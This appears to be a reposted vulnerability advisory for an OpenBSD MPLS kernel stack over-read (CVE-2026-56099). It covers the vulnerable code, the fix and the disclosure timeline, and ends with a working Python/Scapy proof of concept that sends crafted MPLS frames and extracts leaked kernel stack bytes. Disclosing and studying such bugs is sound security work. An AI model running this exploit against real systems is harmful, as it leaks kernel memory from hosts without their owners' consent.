Share
## https://sploitus.com/exploit?id=PACKETSTORM:223968
------------------------------------------------------------------------
    OpenBSD mpls_do_error: Remote Kernel Stack Disclosure via MPLS Label 
    Stack Over-read
    ------------------------------------------------------------------------
    
    Affected:  OpenBSD -current prior to 2026-06-18 (fixed in -current)
    Vendor:    OpenBSD
    Severity:  Medium
    Reporter:  Argus Systems
    Date:      2026-06-12
    CVE:       CVE-2026-56099
    
    
    1. SUMMARY
    ==========
    
    The mpls_do_error() function in sys/netmpls/mpls_input.c parses an
    incoming MPLS label stack into a fixed-size local array,
    struct shim_hdr stack[MPLS_INKERNEL_LOOP_MAX] (16 entries). When the
    parse loop completes without encountering the Bottom-of-Stack (BoS)
    label, nstk reaches MPLS_INKERNEL_LOOP_MAX (16). Several subsequent
    code paths then compute a copy length of (nstk + 1) * sizeof(*shim)
    -- 17 entries -- and use it with icmp_do_exthdr(), M_PREPEND(), and
    m_copyback() against the 16-entry stack object. This reads one
    struct shim_hdr (4 bytes) past the end of the array, and that data is
    reflected back to the sender inside the generated ICMP/MPLS error
    response.
    
    
    2. AFFECTED VERSIONS
    ====================
    
    The (nstk + 1) length computations against the 16-entry stack[] array
    were introduced with the ICMP/MPLS error path on 2010-09-13 (commit
    201d6983add, "First shot at ICMP error handling inside an MPLS path.
    Currently only TTL exceeded errors for IPv4 are handled."). The parse
    loop was bounded by MPLS_INKERNEL_LOOP_MAX (16), but nothing rejected
    a stack that ran to completion without a BoS bit, so nstk could reach
    16 and the subsequent (nstk + 1) reads accessed stack[16].
    
    Affected: OpenBSD -current prior to 2026-06-18 (mpls_input.c pre
    v1.82).
    
    
    3. DETAILS
    ==========
    
    Vulnerable code (sys/netmpls/mpls_input.c, mpls_do_error):
    
      struct shim_hdr stack[MPLS_INKERNEL_LOOP_MAX];   /* 16 entries */
      ...
      for (nstk = 0; nstk < MPLS_INKERNEL_LOOP_MAX; nstk++) {
          ...
          stack[nstk] = *mtod(m, struct shim_hdr *);
          m_adj(m, sizeof(*shim));
          if (MPLS_BOS_ISSET(stack[nstk].shim_label))
              break;
      }
      /* no guard: with no BoS bit set, nstk == 16 here */
    
      shim = &stack[0];
      ...
      case IPVERSION:
          ...
          if (icmp_do_exthdr(m, ICMP_EXT_MPLS, 1, stack,
              (nstk + 1) * sizeof(*shim)))
              return (NULL);
          ...
    
    MPLS_INKERNEL_LOOP_MAX is defined as 16 and sizeof(struct shim_hdr) is
    4. With nstk == 16, each of these copies 17 * 4 = 68 bytes from a
    64-byte stack[] object, reading stack[16] -- one struct shim_hdr (4
    bytes) of adjacent kernel stack -- and including it in the response.
    
    The same (nstk + 1) length is later used to prepend and m_copyback()
    the stack back onto the reflected packet:
    
      M_PREPEND(m, (nstk + 1) * sizeof(*shim), M_NOWAIT);
      ...
      m_copyback(m, 0, (nstk + 1) * sizeof(*shim), stack, M_NOWAIT);
    
    so the leaked entry also travels on the wire as the 17th MPLS shim
    header of the returned frame.
    
    
    4. REACHABILITY
    ===============
    
    The path is reachable remotely via mpls_input() -> mpls_do_error() on
    systems that have MPLS enabled on an interface. The trigger is a
    crafted MPLS frame (EtherType 0x8847) carrying 16 labels with no BoS
    bit set and an outermost label TTL of 1, so the TTL-exceeded error
    path is taken:
    
      mpls_input  (ttl <= 1)
        -> mpls_do_error(m, ICMP_TIMXCEED, ICMP_TIMXCEED_INTRANS, 0)
    
    The inner payload must be IPv4 so the IPVERSION branch is reached.
    
    
    5. IMPACT
    =========
    
    Each crafted packet leaks 4 bytes of kernel stack memory adjacent to
    the stack[] array. The leak is carried in the ICMP/MPLS extension
    object of the error response reflected back to the sender, so an
    attacker can harvest the leaked bytes.
    
    
    6. PROOF OF CONCEPT
    ===================
    
    A Python/Scapy PoC sends a 16-label MPLS frame with no BoS bit set
    and an outermost label TTL of 1, then captures the reply. On a
    vulnerable kernel the reply carries 17 MPLS shim headers on the wire;
    the 17th (stack[16]) is the leaked kernel stack data.
    
    PoC:
    https://pop.argus-systems.ai/attachments/poc-008-mpls-stack-leak.py
    
    
    7. FIX
    ======
    
    Fixed in -current by mvs on 2026-06-18. The fix adds a guard that
    drops a label stack which runs to completion without a BoS bit, so
    nstk can no longer reach MPLS_INKERNEL_LOOP_MAX:
    
      if (nstk >= MPLS_INKERNEL_LOOP_MAX) {
          m_freem(m);
          return (NULL);
      }
    
    Fix commit (mpls_input.c v1.82):
    https://github.com/openbsd/src/commit/6a23123ec05f1eb29cfcaae0f3a468b2e1983cfd
    
    
    8. TIMELINE
    ===========
    
      2026-06-12  Reported to security@openbsd.org with PoC
      2026-06-18  Fix committed to -current
    
    
    9. CREDIT
    =========
    
    Discovered and reported by Argus Systems (https://byteray.co.uk/).
    
    
    10. REFERENCES
    ==============
    
    Advisory:
      https://pop.argus-systems.ai/advisory/adv-040.html
    
    Proof of concept:
    https://pop.argus-systems.ai/attachments/poc-008-mpls-stack-leak.py
    
    Fix commit:
    https://github.com/openbsd/src/commit/6a23123ec05f1eb29cfcaae0f3a468b2e1983cfd
    
    
    --- packet storm poc attached ---
    
    #!/usr/bin/env python3
    """
    PoC for report-008: MPLS label stack OOB read in mpls_do_error.
    
    When 16 MPLS labels arrive with no BoS bit set and TTL expires,
    nstk reaches 16 and (nstk+1)*sizeof(shim_hdr) = 17 entries are
    passed to icmp_do_exthdr / m_copyback. The 17th entry (stack[16])
    is adjacent kernel stack memory, reflected back in the ICMP error's
    MPLS extension object.
    
    Setup required:
      Host:    tap0 at 192.168.100.1
      OpenBSD: vio0 at 192.168.100.2, mpls enabled
    
    OpenBSD setup commands (as root):
      # ifconfig vio0 192.168.100.2/24 mpls up
      # sysctl net.mpls.ttl=255
    
    Usage:
      sudo python3 poc-008-mpls-stack-leak.py [--iface tap0] [--dst 192.168.100.2]
    """
    
    import argparse
    import sys
    from scapy.all import Ether, IP, ICMP, sendp, sniff, get_if_hwaddr, get_if_list, srp, ARP
    from scapy.contrib.mpls import MPLS
    
    MPLS_INKERNEL_LOOP_MAX = 16
    
    
    def resolve_mac(dst_ip, iface, src_ip):
        ans, _ = srp(
            Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=dst_ip, psrc=src_ip),
            iface=iface, timeout=2, verbose=False
        )
        if not ans:
            return None
        return ans[0][1][ARP].hwsrc
    
    
    def build_trigger(dst_mac, src_mac, dst_ip, src_ip):
        """
        16 MPLS labels, no BoS on any, outermost TTL=1 so it expires on ingress.
        Inner IPv4 payload so mpls_do_error takes the IPVERSION branch.
        """
        inner = IP(src=src_ip, dst=dst_ip, ttl=64, proto=1) / ICMP()
    
        stack = None
        for i in range(MPLS_INKERNEL_LOOP_MAX - 1, -1, -1):
            ttl = 1 if i == 0 else 64
            lbl = MPLS(label=100 + i, s=0, ttl=ttl)
            stack = lbl / stack if stack else lbl
    
        return Ether(src=src_mac, dst=dst_mac, type=0x8847) / stack / inner
    
    
    def parse_extension(icmp_raw):
        # ICMP extensions follow 128 bytes of original datagram
        offset = 128
        if len(icmp_raw) <= offset:
            return None
        return icmp_raw[offset:]
    
    
    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument("--iface", default="tap0")
        parser.add_argument("--dst",   default="192.168.100.2")
        parser.add_argument("--src",   default="192.168.100.1")
        args = parser.parse_args()
    
        if args.iface not in get_if_list():
            print(f"ERROR: interface {args.iface} not found", file=sys.stderr)
            sys.exit(1)
    
        src_mac = get_if_hwaddr(args.iface)
    
        print(f"Resolving MAC for {args.dst}...")
        dst_mac = resolve_mac(args.dst, args.iface, args.src)
        if not dst_mac:
            print("ARP failed -- is the VM up and vio0 configured?")
            sys.exit(1)
        print(f"  {args.dst} is at {dst_mac}")
    
        pkt = build_trigger(dst_mac, src_mac, args.dst, args.src)
    
        # The kernel's mpls_do_error builds an ICMP error, prepends (nstk+1)=17
        # shim headers (one past the 16-entry stack[]), then mpls_input SWAPs
        # label 100->200 and sends it back as EtherType 0x8847. We capture that.
        from scapy.all import AsyncSniffer
        is_mpls_from_vm = lambda p: (
            p.haslayer('Ether') and
            p['Ether'].type == 0x8847 and
            p['Ether'].src == dst_mac
        )
        sniffer = AsyncSniffer(iface=args.iface, count=1, timeout=5,
                               lfilter=is_mpls_from_vm)
        sniffer.start()
    
        print(f"Sending {MPLS_INKERNEL_LOOP_MAX}-label no-BoS packet (outermost TTL=1)...")
        sendp(pkt, iface=args.iface, verbose=False)
    
        sniffer.join(timeout=5)
        replies = sniffer.results or []
    
        if not replies:
            print("\nNo MPLS reply received.")
            print("Fix: in the VM as root, swap the route:")
            print("  route delete -mpls -in 100 -pop -inet 192.168.100.1")
            print("  route add -mpls -in 100 -swap -out 200 -inet 192.168.100.1")
            return
    
        reply = replies[0]
        raw = bytes(reply)[14:]  # strip 14-byte Ethernet header
        print(f"\nMPLS reply received ({len(raw)} bytes)  [TRIGGER CONFIRMED]")
    
        # Wire packet structure (after Ethernet):
        #   [0]      label 200        — SWAP outgoing label (replaced stack[0]=100)
        #   [1..15]  labels 101–115   — stack[1..15], all s=0
        #   [16]     stack[16]        — OOB read: 4 bytes past the 64-byte stack[] array
        #   [17+]    inner IP/ICMP    — bytes misread as shims by this loop
        #
        # Expected labels 101-115 have raw 0x00065040 .. 0x00073040 pattern.
        # stack[16] will NOT match that pattern.
        EXPECTED_SHIMS = MPLS_INKERNEL_LOOP_MAX + 1  # 1 SWAP + 15 inner + 1 leaked
    
        print(f"\nMPLS shim headers (first {EXPECTED_SHIMS + 2} parsed):")
        offset = 0
        shim_count = 0
        ip_start = None
        while offset + 4 <= len(raw) and shim_count < EXPECTED_SHIMS + 2:
            chunk = raw[offset:offset+4]
            val   = int.from_bytes(chunk, 'big')
            label = (val >> 12) & 0xFFFFF
            s     = (val >> 8)  & 0x1
            ttl   =  val        & 0xFF
            if shim_count == 0:
                tag = "  (SWAP outgoing label)"
            elif shim_count == MPLS_INKERNEL_LOOP_MAX:
                # slot 16: 1 SWAP + 15 inner labels (101-115) = index 16 = stack[16]
                tag = "  <-- stack[16] LEAKED KERNEL STACK BYTES"
                leaked_bytes = chunk
            elif shim_count >= MPLS_INKERNEL_LOOP_MAX:
                tag = "  (inner IP header)"
                if ip_start is None:
                    ip_start = offset
            else:
                tag = ""
            print(f"  [{shim_count:2d}] label={label:<6} s={s} ttl={ttl:<3}  raw={chunk.hex()}{tag}")
            offset += 4
            shim_count += 1
            if s == 1 and ip_start is None:
                ip_start = offset
                break
    
        # The actual IP packet starts at offset 17*4 = 68 bytes (17 MPLS shims on wire)
        # regardless of how many the loop consumed.
        ip_offset = EXPECTED_SHIMS * 4  # 17 * 4 = 68
        if ip_start is None:
            ip_start = ip_offset
    
        # Verify: shim count in reply
        # A correct implementation would return NULL (no reply) or send <=16 shims.
        # Seeing 17 shims (SWAP + 15 inner + 1 leaked) proves the OOB read.
        oob_confirmed = shim_count > MPLS_INKERNEL_LOOP_MAX
        if not oob_confirmed:
            print(f"\nNOT TRIGGERED")
    
    
    if __name__ == "__main__":
        main()